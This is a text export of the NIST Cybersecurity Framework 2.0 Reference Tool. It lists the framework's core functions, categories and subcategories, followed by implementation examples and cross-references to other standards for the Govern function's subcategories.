csf2 References


NIST Cybersecurity Framework (CSF) 2.0 Reference Tool

Title The NIST Cybersecurity Framework (CSF) 2.0

Read Me This is a download from the CSF 2.0 Reference Tool, which assists users in exploring the CSF 2.0 Core. This export is a user generated version of the Core ver

Change Log Final


The NIST Cybersecurity Framework 2.0 www.nist.gov/cyberframework

Function Category Subcategory


GOVERN (GV): The organization's
cybersecurity risk management
strategy, expectations, and policy are
established, communicated, and
monitored

Organizational Context (GV.OC): The circumstances - mission, stakeholder expectations, dependencies, and legal, regulatory, and contractual requirements - surrounding the organization's cybersecurity risk management decisions are understood

GV.OC-01: The organizational mission is understood and informs cybersecurity risk management

CSF 2.0 Page 2 of 145


GV.OC-02: Internal and external stakeholders
are understood, and their needs and
expectations regarding cybersecurity risk
management are understood and considered

GV.OC-03: Legal, regulatory, and contractual
requirements regarding cybersecurity - including
privacy and civil liberties obligations - are
understood and managed

GV.OC-04: Critical objectives, capabilities, and
services that stakeholders depend on or expect
from the organization are understood and
communicated

GV.OC-05: Outcomes, capabilities, and services that the organization depends on are understood and communicated

Risk Management Strategy (GV.RM): The
organization's priorities, constraints, risk
tolerance and appetite statements, and
assumptions are established,
communicated, and used to support
operational risk decisions

GV.RM-01: Risk management objectives are established and agreed to by organizational stakeholders

GV.RM-02: Risk appetite and risk tolerance statements are established, communicated, and maintained

GV.RM-03: Cybersecurity risk management
activities and outcomes are included in
enterprise risk management processes

GV.RM-04: Strategic direction that describes appropriate risk response options is established and communicated

GV.RM-05: Lines of communication across the
organization are established for cybersecurity
risks, including risks from suppliers and other
third parties

GV.RM-06: A standardized method for calculating, documenting, categorizing, and prioritizing cybersecurity risks is established and communicated

GV.RM-07: Strategic opportunities (i.e., positive
risks) are characterized and are included in
organizational cybersecurity risk discussions

Roles, Responsibilities, and Authorities (GV.RR): Cybersecurity roles, responsibilities, and authorities to foster accountability, performance assessment, and continuous improvement are established and communicated

GV.RR-01: Organizational leadership is
responsible and accountable for cybersecurity
risk and fosters a culture that is risk-aware,
ethical, and continually improving

GV.RR-02: Roles, responsibilities, and authorities
related to cybersecurity risk management are
established, communicated, understood, and
enforced

GV.RR-03: Adequate resources are allocated
commensurate with the cybersecurity risk
strategy, roles, responsibilities, and policies

GV.RR-04: Cybersecurity is included in human resources practices

Policy (GV.PO): Organizational cybersecurity policy is established, communicated, and enforced

GV.PO-01: Policy for managing cybersecurity
risks is established based on organizational
context, cybersecurity strategy, and priorities
and is communicated and enforced

GV.PO-02: Policy for managing cybersecurity
risks is reviewed, updated, communicated, and
enforced to reflect changes in requirements,
threats, technology, and organizational mission

Oversight (GV.OV): Results of organization-wide cybersecurity risk management activities and performance are used to inform, improve, and adjust the risk management strategy

GV.OV-01: Cybersecurity risk management
strategy outcomes are reviewed to inform and
adjust strategy and direction

GV.OV-02: The cybersecurity risk management
strategy is reviewed and adjusted to ensure
coverage of organizational requirements and
risks

GV.OV-03: Organizational cybersecurity risk management performance is evaluated and reviewed for adjustments needed

Cybersecurity Supply Chain Risk Management (GV.SC): Cyber supply chain risk management processes are identified, established, managed, monitored, and improved by organizational stakeholders

GV.SC-01: A cybersecurity supply chain risk
management program, strategy, objectives,
policies, and processes are established and
agreed to by organizational stakeholders

GV.SC-02: Cybersecurity roles and
responsibilities for suppliers, customers, and
partners are established, communicated, and
coordinated internally and externally

GV.SC-03: Cybersecurity supply chain risk
management is integrated into cybersecurity
and enterprise risk management, risk
assessment, and improvement processes

GV.SC-04: Suppliers are known and prioritized by
criticality

GV.SC-05: Requirements to address
cybersecurity risks in supply chains are
established, prioritized, and integrated into
contracts and other types of agreements with
suppliers and other relevant third parties

GV.SC-06: Planning and due diligence are
performed to reduce risks before entering into
formal supplier or other third-party relationships

GV.SC-07: The risks posed by a supplier, their
products and services, and other third parties
are understood, recorded, prioritized, assessed,
responded to, and monitored over the course of
the relationship

GV.SC-08: Relevant suppliers and other third
parties are included in incident planning,
response, and recovery activities

GV.SC-09: Supply chain security practices are
integrated into cybersecurity and enterprise risk
management programs, and their performance
is monitored throughout the technology product
and service life cycle

GV.SC-10: Cybersecurity supply chain risk
management plans include provisions for
activities that occur after the conclusion of a
partnership or service agreement

GOVERN (GV)
IDENTIFY (ID): The organization's
current cybersecurity risks are
understood

Asset Management (ID.AM): Assets (e.g.,
data, hardware, software, systems,
facilities, services, people) that enable the
organization to achieve business purposes
are identified and managed consistent with
their relative importance to organizational
objectives and the organization's risk
strategy

ID.AM-01: Inventories of hardware managed by the organization are maintained

ID.AM-02: Inventories of software, services, and systems managed by the organization are maintained

ID.AM-03: Representations of the organization's
authorized network communication and internal
and external network data flows are maintained

ID.AM-04: Inventories of services provided by suppliers are maintained

ID.AM-05: Assets are prioritized based on
classification, criticality, resources, and impact
on the mission

ID.AM-07: Inventories of data and corresponding metadata for designated data types are maintained

ID.AM-08: Systems, hardware, software,
services, and data are managed throughout their
life cycles

Risk Assessment (ID.RA): The cybersecurity risk to the organization, assets, and individuals is understood by the organization

ID.RA-01: Vulnerabilities in assets are identified,
validated, and recorded

ID.RA-02: Cyber threat intelligence is received from information sharing forums and sources

ID.RA-03: Internal and external threats to the
organization are identified and recorded

ID.RA-04: Potential impacts and likelihoods of threats exploiting vulnerabilities are identified and recorded

ID.RA-05: Threats, vulnerabilities, likelihoods,
and impacts are used to understand inherent
risk and inform risk response prioritization

ID.RA-06: Risk responses are chosen, prioritized, planned, tracked, and communicated

ID.RA-07: Changes and exceptions are managed,
assessed for risk impact, recorded, and tracked

ID.RA-08: Processes for receiving, analyzing, and responding to vulnerability disclosures are established

ID.RA-09: The authenticity and integrity of
hardware and software are assessed prior to
acquisition and use

ID.RA-10: Critical suppliers are assessed prior to acquisition

Improvement (ID.IM): Improvements to
organizational cybersecurity risk
management processes, procedures and
activities are identified across all CSF
Functions

ID.IM-01: Improvements are identified from
evaluations

ID.IM-02: Improvements are identified from
security tests and exercises, including those
done in coordination with suppliers and relevant
third parties

ID.IM-03: Improvements are identified from
execution of operational processes, procedures,
and activities

ID.IM-04: Incident response plans and other
cybersecurity plans that affect operations are
established, communicated, maintained, and
improved

IDENTIFY (ID)
PROTECT (PR): Safeguards to manage
the organization's cybersecurity risks
are used

Identity Management, Authentication, and
Access Control (PR.AA): Access to physical
and logical assets is limited to authorized
users, services, and hardware and
managed commensurate with the assessed
risk of unauthorized access

PR.AA-01: Identities and credentials for authorized users, services, and hardware are managed by the organization

PR.AA-02: Identities are proofed and bound to
credentials based on the context of interactions

PR.AA-03: Users, services, and hardware are authenticated

PR.AA-04: Identity assertions are protected,
conveyed, and verified

PR.AA-05: Access permissions, entitlements, and
authorizations are defined in a policy, managed,
enforced, and reviewed, and incorporate the
principles of least privilege and separation of
duties

PR.AA-06: Physical access to assets is managed,
monitored, and enforced commensurate with
risk

Awareness and Training (PR.AT): The organization's personnel are provided with cybersecurity awareness and training so that they can perform their cybersecurity-related tasks

PR.AT-01: Personnel are provided with
awareness and training so that they possess the
knowledge and skills to perform general tasks
with cybersecurity risks in mind

PR.AT-02: Individuals in specialized roles are
provided with awareness and training so that
they possess the knowledge and skills to
perform relevant tasks with cybersecurity risks in
mind

Data Security (PR.DS): Data are managed consistent with the organization's risk strategy to protect the confidentiality, integrity, and availability of information

PR.DS-01: The confidentiality, integrity, and
availability of data-at-rest are protected

PR.DS-02: The confidentiality, integrity, and
availability of data-in-transit are protected

PR.DS-10: The confidentiality, integrity, and
availability of data-in-use are protected

PR.DS-11: Backups of data are created,
protected, maintained, and tested

Platform Security (PR.PS): The hardware, software (e.g., firmware, operating systems, applications), and services of physical and virtual platforms are managed consistent with the organization's risk strategy to protect their confidentiality, integrity, and availability

PR.PS-01: Configuration management practices
are established and applied

PR.PS-02: Software is maintained, replaced, and
removed commensurate with risk

PR.PS-03: Hardware is maintained, replaced, and
removed commensurate with risk

PR.PS-04: Log records are generated and made available for continuous monitoring

PR.PS-05: Installation and execution of
unauthorized software are prevented

PR.PS-06: Secure software development practices are integrated, and their performance is monitored throughout the software development life cycle

Technology Infrastructure Resilience
(PR.IR): Security architectures are managed
with the organization's risk strategy to
protect asset confidentiality, integrity, and
availability, and organizational resilience

PR.IR-01: Networks and environments are protected from unauthorized logical access and usage

PR.IR-02: The organization's technology assets
are protected from environmental threats

PR.IR-03: Mechanisms are implemented to achieve resilience requirements in normal and adverse situations

PR.IR-04: Adequate resource capacity to ensure availability is maintained

PROTECT (PR)
DETECT (DE): Possible cybersecurity
attacks and compromises are found
and analyzed

Continuous Monitoring (DE.CM): Assets are monitored to find anomalies, indicators of compromise, and other potentially adverse events

DE.CM-01: Networks and network services are monitored to find potentially adverse events

DE.CM-02: The physical environment is
monitored to find potentially adverse events

DE.CM-03: Personnel activity and technology usage are monitored to find potentially adverse events

DE.CM-06: External service provider activities
and services are monitored to find potentially
adverse events

DE.CM-09: Computing hardware and software,
runtime environments, and their data are
monitored to find potentially adverse events

Adverse Event Analysis (DE.AE): Anomalies, indicators of compromise, and other potentially adverse events are analyzed to characterize the events and detect cybersecurity incidents

DE.AE-02: Potentially adverse events are
analyzed to better understand associated
activities

DE.AE-03: Information is correlated from multiple sources

DE.AE-04: The estimated impact and scope of
adverse events are understood

DE.AE-06: Information on adverse events is provided to authorized staff and tools

DE.AE-07: Cyber threat intelligence and other
contextual information are integrated into the
analysis

DE.AE-08: Incidents are declared when adverse events meet the defined incident criteria

DETECT (DE)
RESPOND (RS): Actions regarding a
detected cybersecurity incident are
taken

Incident Management (RS.MA): Responses to detected cybersecurity incidents are managed

RS.MA-01: The incident response plan is
executed in coordination with relevant third
parties once an incident is declared

RS.MA-02: Incident reports are triaged and validated

RS.MA-03: Incidents are categorized and prioritized

RS.MA-04: Incidents are escalated or elevated as
needed

RS.MA-05: The criteria for initiating incident recovery are applied

Incident Analysis (RS.AN): Investigations are conducted to ensure effective response and support forensics and recovery activities

RS.AN-03: Analysis is performed to establish what has taken place during an incident and the root cause of the incident

RS.AN-06: Actions performed during an
investigation are recorded, and the records'
integrity and provenance are preserved

RS.AN-07: Incident data and metadata are collected, and their integrity and provenance are preserved

RS.AN-08: An incident's magnitude is estimated and validated

Incident Response Reporting and Communication (RS.CO): Response activities are coordinated with internal and external stakeholders as required by laws, regulations, or policies

RS.CO-02: Internal and external stakeholders are
notified of incidents

RS.CO-03: Information is shared with designated internal and external stakeholders

Incident Mitigation (RS.MI): Activities are
performed to prevent expansion of an
event and mitigate its effects

RS.MI-01: Incidents are contained

RS.MI-02: Incidents are eradicated

RESPOND (RS)
RECOVER (RC): Assets and operations
affected by a cybersecurity incident
are restored

Incident Recovery Plan Execution (RC.RP): Restoration activities are performed to ensure operational availability of systems and services affected by cybersecurity incidents

RC.RP-01: The recovery portion of the incident response plan is executed once initiated from the incident response process

RC.RP-02: Recovery actions are selected, scoped,
prioritized, and performed

RC.RP-03: The integrity of backups and other restoration assets is verified before using them for restoration

RC.RP-04: Critical mission functions and cybersecurity risk management are considered to establish post-incident operational norms

RC.RP-05: The integrity of restored assets is verified, systems and services are restored, and normal operating status is confirmed

RC.RP-06: The end of incident recovery is
declared based on criteria, and incident-related
documentation is completed

Incident Recovery Communication (RC.CO): Restoration activities are coordinated with internal and external parties

RC.CO-03: Recovery activities and progress in restoring operational capabilities are communicated to designated internal and external stakeholders

RC.CO-04: Public updates on incident recovery
are shared using approved methods and
messaging

RECOVER (RC)

Implementation Examples Informative References
CRI Profile v2.0: GV
CSF v1.1: ID.GV
SP 800-221A: GV.PO

CRI Profile v2.0: GV.OC
CSF v1.1: ID.BE
SP 800-221A: GV.CT
SP 800-221A: GV.CT-5

Implementation Examples:
Ex1: Share the organization's mission (e.g., through vision and mission statements, marketing, and service strategies) to provide a basis for identifying risks that may impede that mission

Informative References:
CRI Profile v2.0: GV.OC-01
CRI Profile v2.0: GV.OC-01.01
CSF v1.1: ID.BE-2
CSF v1.1: ID.BE-3
SP 800-221A: GV.CT-5
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: PM-11

Implementation Examples:
Ex1: Identify relevant internal stakeholders and their cybersecurity-related expectations (e.g., performance and risk expectations of officers, directors, and advisors; cultural expectations of employees)
Ex2: Identify relevant external stakeholders and their cybersecurity-related expectations (e.g., privacy expectations of customers, business expectations of partnerships, compliance expectations of regulators, ethics expectations of society)

Informative References:
CRI Profile v2.0: GV.OC-02
CRI Profile v2.0: GV.OC-02.01
CRI Profile v2.0: GV.OC-02.02
CRI Profile v2.0: GV.OC-02.03
CSF v1.1: ID.SC-2
CSF v1.1: ID.GV-2
SP 800-218: PO.2.1
SP 800-221A: GV.OV-2
SP 800-221A: GV.CT-2
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06
SP 800-53 Rev 5.1.1: SR-08

Implementation Examples:
Ex1: Determine a process to track and manage legal and regulatory requirements regarding protection of individuals' information (e.g., Health Insurance Portability and Accountability Act, California Consumer Privacy Act, General Data Protection Regulation)
Ex2: Determine a process to track and manage contractual requirements for cybersecurity management of supplier, customer, and partner information
Ex3: Align the organization's cybersecurity strategy with legal, regulatory, and contractual requirements

Informative References:
CRI Profile v2.0: GV.OC-03
CRI Profile v2.0: GV.OC-03.01
CRI Profile v2.0: GV.OC-03.02
CSF v1.1: ID.GV-3
SP 800-218: PO.1.1
SP 800-218: PO.1.2
SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PT

Implementation Examples:
Ex1: Establish criteria for determining the criticality of capabilities and services as viewed by internal and external stakeholders
Ex2: Determine (e.g., from a business impact analysis) assets and business operations that are vital to achieving mission objectives and the potential impact of a loss (or partial loss) of such operations
Ex3: Establish and communicate resilience objectives (e.g., recovery time objectives) for delivering critical capabilities and services in various operating states (e.g., under attack, during recovery, normal operation)

Informative References:
CRI Profile v2.0: GV.OC-04
CRI Profile v2.0: GV.OC-04.01
CRI Profile v2.0: GV.OC-04.02
CRI Profile v2.0: GV.OC-04.03
CRI Profile v2.0: GV.OC-04.04
CSF v1.1: ID.BE-4
CSF v1.1: ID.BE-5
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: PM-08
SP 800-53 Rev 5.1.1: PM-11
SP 800-53 Rev 5.1.1: CP-02(08)
SP 800-53 Rev 5.1.1: PM-30(01)
SP 800-53 Rev 5.1.1: RA-09

Implementation Examples:
Ex1: Create an inventory of the organization's dependencies on external resources (e.g., facilities, cloud-based hosting providers) and their relationships to organizational assets and business functions
Ex2: Identify and document external dependencies that are potential points of failure for the organization's critical capabilities and services, and share that information with appropriate personnel

Informative References:
CRI Profile v2.0: GV.OC-05
CRI Profile v2.0: GV.OC-05.01
CRI Profile v2.0: GV.OC-05.02
CRI Profile v2.0: GV.OC-05.03
CRI Profile v2.0: GV.OC-05.04
CSF v1.1: ID.BE-1
CSF v1.1: ID.BE-4
SP 800-221A: GV.CT-5
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: PM-11
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-05

CRI Profile v2.0: GV.RM
CSF v1.1: ID.RM
SP 800-221A: GV.BE-3

Implementation Examples:
Ex1: Update near-term and long-term cybersecurity risk management objectives as part of annual strategic planning and when major changes occur
Ex2: Establish measurable objectives for cybersecurity risk management (e.g., manage the quality of user training, ensure adequate risk protection for industrial control systems)
Ex3: Senior leaders agree about cybersecurity objectives and use them for measuring and managing risk and performance

Informative References:
CRI Profile v2.0: GV.RM-01
CRI Profile v2.0: GV.RM-01.01
CRI Profile v2.0: GV.RM-01.02
CRI Profile v2.0: GV.RM-01.03
CRI Profile v2.0: GV.RM-01.04
CRI Profile v2.0: GV.RM-01.05
CSF v1.1: ID.RM-1
SP 800-221A: GV.RR-2
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-02

Implementation Examples:
Ex1: Determine and communicate risk appetite statements that convey expectations about the appropriate level of risk for the organization
Ex2: Translate risk appetite statements into specific, measurable, and broadly understandable risk tolerance statements
Ex3: Refine organizational objectives and risk appetite periodically based on known risk exposure and residual risk

Informative References:
CRI Profile v2.0: GV.RM-02
CRI Profile v2.0: GV.RM-02.01
CRI Profile v2.0: GV.RM-02.02
CRI Profile v2.0: GV.RM-02.03
CSF v1.1: ID.RM-2
CSF v1.1: ID.RM-3
SP 800-221A: GV.BE-1
SP 800-221A: GV.BE-3
SP 800-53 Rev 5.1.1: PM-09

Implementation Examples:
Ex1: Aggregate and manage cybersecurity risks alongside other enterprise risks (e.g., compliance, financial, operational, regulatory, reputational, safety)
Ex2: Include cybersecurity risk managers in enterprise risk management planning
Ex3: Establish criteria for escalating cybersecurity risks within enterprise risk management

Informative References:
CRI Profile v2.0: GV.RM-03
CRI Profile v2.0: GV.RM-03.01
CRI Profile v2.0: GV.RM-03.02
CRI Profile v2.0: GV.RM-03.03
CRI Profile v2.0: GV.RM-03.04
CSF v1.1: ID.GV-4
SP 800-221A: GV.PO-2
SP 800-221A: GV.PO-3
SP 800-53 Rev 5.1.1: PM-03
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-02

Implementation Examples:
Ex1: Specify criteria for accepting and avoiding cybersecurity risk for various classifications of data
Ex2: Determine whether to purchase cybersecurity insurance
Ex3: Document conditions under which shared responsibility models are acceptable (e.g., outsourcing certain cybersecurity functions, having a third party perform financial transactions on behalf of the organization, using public cloud-based services)

Informative References:
CRI Profile v2.0: GV.RM-04
CRI Profile v2.0: GV.RM-04.01
CSF v1.1: ID.RM-2
SP 800-221A: GV.BE-1
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: SR-02

Implementation Examples:
Ex1: Determine how to update senior executives, directors, and management on the organization's cybersecurity posture at agreed-upon intervals
Ex2: Identify how all departments across the organization - such as management, operations, internal auditors, legal, acquisition, physical security, and HR - will communicate with each other about cybersecurity risks

Informative References:
CRI Profile v2.0: GV.RM-05
CRI Profile v2.0: GV.RM-05.01
CRI Profile v2.0: GV.RM-05.02
CSF v1.1: ID.SC-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-30

Implementation Examples:
Ex1: Establish criteria for using a quantitative approach to cybersecurity risk analysis, and specify probability and exposure formulas
Ex2: Create and use templates (e.g., a risk register) to document cybersecurity risk information (e.g., risk description, exposure, treatment, and ownership)
Ex3: Establish criteria for risk prioritization at the appropriate levels within the enterprise
Ex4: Use a consistent list of risk categories to support integrating, aggregating, and comparing cybersecurity risks

Informative References:
CRI Profile v2.0: GV.RM-06
CRI Profile v2.0: GV.RM-06.01
CSF v1.1: ID.RM-1
SP 800-221A: GV.RR-2
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-03

Implementation Examples:
Ex1: Define and communicate guidance and methods for identifying opportunities and including them in risk discussions (e.g., strengths, weaknesses, opportunities, and threats [SWOT] analysis)
Ex2: Identify stretch goals and document them
Ex3: Calculate, document, and prioritize positive risks alongside negative risks

Informative References:
CRI Profile v2.0: GV.RM-07
CRI Profile v2.0: GV.RM-07.01
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-03

CRI Profile v2.0: GV.RR
CSF v1.1: ID.GV-2
SP 800-218: PO.2.1
SP 800-221A: GV.OV-2

Implementation Examples:
Ex1: Leaders (e.g., directors) agree on their roles and responsibilities in developing, implementing, and assessing the organization's cybersecurity strategy
Ex2: Share leaders' expectations regarding a secure and ethical culture, especially when current events present the opportunity to highlight positive or negative examples of cybersecurity risk management
Ex3: Leaders direct the CISO to maintain a comprehensive cybersecurity risk strategy and review and update it at least annually and after major events
Ex4: Conduct reviews to ensure adequate authority and coordination among those responsible for managing cybersecurity risk

Informative References:
CIS Controls v8.0: 14.1
CRI Profile v2.0: GV.RR-01
CRI Profile v2.0: GV.RR-01.01
CRI Profile v2.0: GV.RR-01.02
CRI Profile v2.0: GV.RR-01.03
CRI Profile v2.0: GV.RR-01.04
CRI Profile v2.0: GV.RR-01.05
SP 800-218: PO.2.3
SP 800-53 Rev 5.1.1: PM-02
SP 800-53 Rev 5.1.1: PM-19
SP 800-53 Rev 5.1.1: PM-23
SP 800-53 Rev 5.1.1: PM-24
SP 800-53 Rev 5.1.1: PM-29

Implementation Examples:
Ex1: Document risk management roles and responsibilities in policy
Ex2: Document who is responsible and accountable for cybersecurity risk management activities and how those teams and individuals are to be consulted and informed
Ex3: Include cybersecurity responsibilities and performance requirements in personnel descriptions
Ex4: Document performance goals for personnel with cybersecurity risk management responsibilities, and periodically measure performance to identify areas for improvement
Ex5: Clearly articulate cybersecurity responsibilities within operations, risk functions, and internal audit functions

Informative References:
CIS Controls v8.0: 14.9
CRI Profile v2.0: GV.RR-02
CRI Profile v2.0: GV.RR-02.01
CRI Profile v2.0: GV.RR-02.02
CRI Profile v2.0: GV.RR-02.03
CRI Profile v2.0: GV.RR-02.04
CRI Profile v2.0: GV.RR-02.05
CRI Profile v2.0: GV.RR-02.06
CRI Profile v2.0: GV.RR-02.07
CSF v1.1: ID.AM-6
CSF v1.1: ID.GV-2
CSF v1.1: DE.DP-1
SP 800-218: PO.2.1
SP 800-221A: GV.RR-1
SP 800-221A: GV.RR-2
SP 800-221A: GV.OV-2
SP 800-53 Rev 5.1.1: PM-02
SP 800-53 Rev 5.1.1: PM-13
SP 800-53 Rev 5.1.1: PM-19
SP 800-53 Rev 5.1.1: PM-23
SP 800-53 Rev 5.1.1: PM-24
SP 800-53 Rev 5.1.1: PM-29

Implementation Examples:
Ex1: Conduct periodic management reviews to ensure that those given cybersecurity risk management responsibilities have the necessary authority
Ex2: Identify resource allocation and investment in line with risk tolerance and response
Ex3: Provide adequate and sufficient people, process, and technical resources to support the cybersecurity strategy

Informative References:
CRI Profile v2.0: GV.RR-03
CRI Profile v2.0: GV.RR-03.01
CRI Profile v2.0: GV.RR-03.02
CRI Profile v2.0: GV.RR-03.03
CSF v1.1: ID.RM-1
SP 800-221A: GV.RR-2
SP 800-53 Rev 5.1.1: PM-03

Implementation Examples:
Ex1: Integrate cybersecurity risk management considerations into human resources processes (e.g., personnel screening, onboarding, change notification, offboarding)
Ex2: Consider cybersecurity knowledge to be a positive factor in hiring, training, and retention decisions
Ex3: Conduct background checks prior to onboarding new personnel for sensitive roles, and periodically repeat background checks for personnel with such roles
Ex4: Define and enforce obligations for personnel to be aware of, adhere to, and uphold security policies as they relate to their roles

Informative References:
CIS Controls v8.0: 6.1
CIS Controls v8.0: 6.2
CRI Profile v2.0: GV.RR-04
CRI Profile v2.0: GV.RR-04.01
CRI Profile v2.0: GV.RR-04.02
CRI Profile v2.0: GV.RR-04.03
CSF v1.1: PR.IP-11
SP 800-53 Rev 5.1.1: PM-13
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PS-07
SP 800-53 Rev 5.1.1: PS-09

Informative References:
CRI Profile v2.0: GV.PO
CSF v1.1: ID.GV-1
SP 800-221A: GV.PO-1

Implementation Examples:
Ex1: Create, disseminate, and maintain an understandable, usable risk management policy with statements of management intent, expectations, and direction
Ex2: Periodically review policy and supporting processes and procedures to ensure that they align with risk management strategy objectives and priorities, as well as the high-level direction of the cybersecurity policy
Ex3: Require approval from senior management on policy
Ex4: Communicate cybersecurity risk management policy and supporting processes and procedures across the organization
Ex5: Require personnel to acknowledge receipt of policy when first hired, annually, and whenever policy is updated

Informative References:
CRI Profile v2.0: GV.PO-01
CRI Profile v2.0: GV.PO-01.01
CRI Profile v2.0: GV.PO-01.02
CRI Profile v2.0: GV.PO-01.03
CRI Profile v2.0: GV.PO-01.04
CRI Profile v2.0: GV.PO-01.05
CRI Profile v2.0: GV.PO-01.06
CRI Profile v2.0: GV.PO-01.07
CRI Profile v2.0: GV.PO-01.08
CSF v1.1: ID.GV-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01

Implementation Examples:
Ex1: Update policy based on periodic reviews of cybersecurity risk management results to ensure that policy and supporting processes and procedures adequately maintain risk at an acceptable level
Ex2: Provide a timeline for reviewing changes to the organization's risk environment (e.g., changes in risk or in the organization's mission objectives), and communicate recommended policy updates
Ex3: Update policy to reflect changes in legal and regulatory requirements
Ex4: Update policy to reflect changes in technology (e.g., adoption of artificial intelligence) and changes to the business (e.g., acquisition of a new business, new contract requirements)

Informative References:
CRI Profile v2.0: GV.PO-02
CRI Profile v2.0: GV.PO-02.01
CSF v1.1: ID.GV-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01

Informative References:
CRI Profile v2.0: GV.OV

Implementation Examples:
Ex1: Measure how well the risk management strategy and risk results have helped leaders make decisions and achieve organizational objectives
Ex2: Examine whether cybersecurity risk strategies that impede operations or innovation should be adjusted

Informative References:
CRI Profile v2.0: GV.OV-01
CRI Profile v2.0: GV.OV-01.01
CRI Profile v2.0: GV.OV-01.02
CRI Profile v2.0: GV.OV-01.03
SP 800-221A: GV.AD-3
SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Review audit findings to confirm whether the existing cybersecurity strategy has ensured compliance with internal and external requirements
Ex2: Review the performance oversight of those in cybersecurity-related roles to determine whether policy changes are necessary
Ex3: Review strategy in light of cybersecurity incidents

Informative References:
CRI Profile v2.0: GV.OV-02
CRI Profile v2.0: GV.OV-02.01
CRI Profile v2.0: GV.OV-02.02
SP 800-221A: GV.AD-2
